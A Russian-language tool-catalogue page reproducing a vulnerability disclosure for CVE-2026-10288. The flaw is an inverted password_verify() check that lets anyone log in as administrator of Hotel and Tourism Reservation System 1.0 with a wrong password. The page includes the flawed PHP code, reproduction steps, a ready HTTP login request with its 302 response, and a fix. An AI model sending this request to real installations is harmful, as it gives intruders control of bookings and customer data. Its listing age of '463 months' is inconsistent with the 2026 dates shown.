Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-10288-AUTH-BYPASS — Эксплойт доказательства концепции для обхода аутентификации в Hotel and Tourism Reservation System 1.0, позволяющий неаутентифицированный доступ администратора через инвертированную логику password_verify. | Kitploit
Инструменты/GitHubGitHub/xmyronn/cve-2026-10288-auth-bypass
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеАутентификация
GitHubxmyronn/cve-2026-10288-auth-bypass

CVE-2026-10288-AUTH-BYPASS

Эксплойт доказательства концепции для обхода аутентификации в Hotel and Tourism Reservation System 1.0, позволяющий неаутентифицированный доступ администратора через инвертированную логику password_verify.

Репозиторий
463 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Система бронирования отелей и туров — Обход аутентификации

Детали уязвимости

ПолеДетали
НазваниеСистема бронирования отелей и туров — Обход аутентификации
Поставщикcode-projects.org
ПродуктСистема бронирования отелей и туров
Версия1.0
Тип уязвимостиНеправильная аутентификация
CWECWE-287
Оценка CVSS9.0 (Критическая)
Вектор CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Затронутый файл/admin/login.php
Требуется аутентификацияНет
Удаленная эксплуатацияДа

Описание

Критическая уязвимость обхода аутентификации существует в функционале входа администратора в Системе бронирования отелей и туров версии 1.0. Уязвимость вызвана инвертированной проверкой условия на возвращаемое значение password_verify(), из-за чего приложение предоставляет доступ при вводе неверного пароля и отказывает в доступе при вводе верного пароля. Неаутентифицированный удаленный злоумышленник может получить полный административный доступ, указав действительный адрес электронной почты и любой произвольный неверный пароль.


Корневая причина

Файл: admin/login.php — строки 39–46

root@kitploit:~
if(password_verify($password, $user['password'])){
    // ОШИБКА: password_verify() возвращает TRUE, если пароль ВЕРНЫЙ
    // но сообщение об ошибке размещено здесь, а не логика входа
    echo '<div class="w3-text-red text-center">Введенный пароль неверен, попробуйте снова.</div>';
} else {
    // ОШИБКА: этот блок выполняется, когда пароль НЕВЕРНЫЙ
    // но вход предоставляется здесь, а не отображается ошибка
    $userID = $user['id'];
    login($userID);
}

password_verify() возвращает true, когда предоставленный пароль соответствует хешу. Разработчик поместил логику успешного входа в ветвь else (которая выполняется, когда функция возвращает false), то есть аутентификация предоставляется при любом неверном пароле.


Воздействие

Удаленный неаутентифицированный злоумышленник может:

  • Получить полный административный доступ к приложению
  • Просматривать, изменять и удалять все бронирования номеров и туров
  • Добавлять, редактировать или удалять номера, туры и мероприятия
  • Получить доступ ко всем данным зарегистрированных пользователей
  • Выполнять все административные операции, не зная пароля администратора

Шаги для воспроизведения

Установка: Установите Систему бронирования отелей и туров версии 1.0 на XAMPP. Откройте приложение по адресу http://localhost/ht/.

Шаг 1: Перейдите на страницу входа администратора.

http:///ht/admin/login.php

Шаг 2: Введите действительный адрес электронной почты администратора и любой неверный пароль.

Электронная почта: [email protected] Пароль: wrongpassword

Шаг 3: Нажмите Войти.

Результат: Приложение обходит аутентификацию и перенаправляет на панель администратора (index.php) — полный административный доступ предоставлен с неверным паролем.


Подтверждение концепции (Burp Suite)

Запрос:

root@kitploit:~
POST /ht/admin/login.php HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded

email=admin%40admin.com&password=test1234&login=Login

Ответ:

root@kitploit:~
HTTP/1.1 302 Found
Location: index.php

Перенаправление 302 на index.php подтверждает успешную аутентификацию с неверным паролем.


Скриншоты

1. Страница входа — введен неверный пароль

Скриншот 2026-05-11 232154

2. Burp Suite — перенаправление 302 подтверждает обход

Скриншот 2026-05-11 232205

3. Исходный код — инвертированная логика

Скриншот 2026-05-11 232228

Рекомендуемое исправление

Поменяйте местами условные ветви, чтобы вход предоставлялся, когда password_verify() возвращает true:

root@kitploit:~
// ИСПРАВЛЕНО
if(password_verify($password, $user['password'])){
    $userID = $user['id'];
    login($userID);
} else {
    echo '<div class="w3-text-red text-center">Введенный пароль неверен, попробуйте снова.</div>';
}

Ссылки

  • CWE-287: Неправильная аутентификация
  • Система бронирования отелей и туров — code-projects.org

Обнаружил

Имад Алви — Независимый исследователь безопасности

Скачать инструмент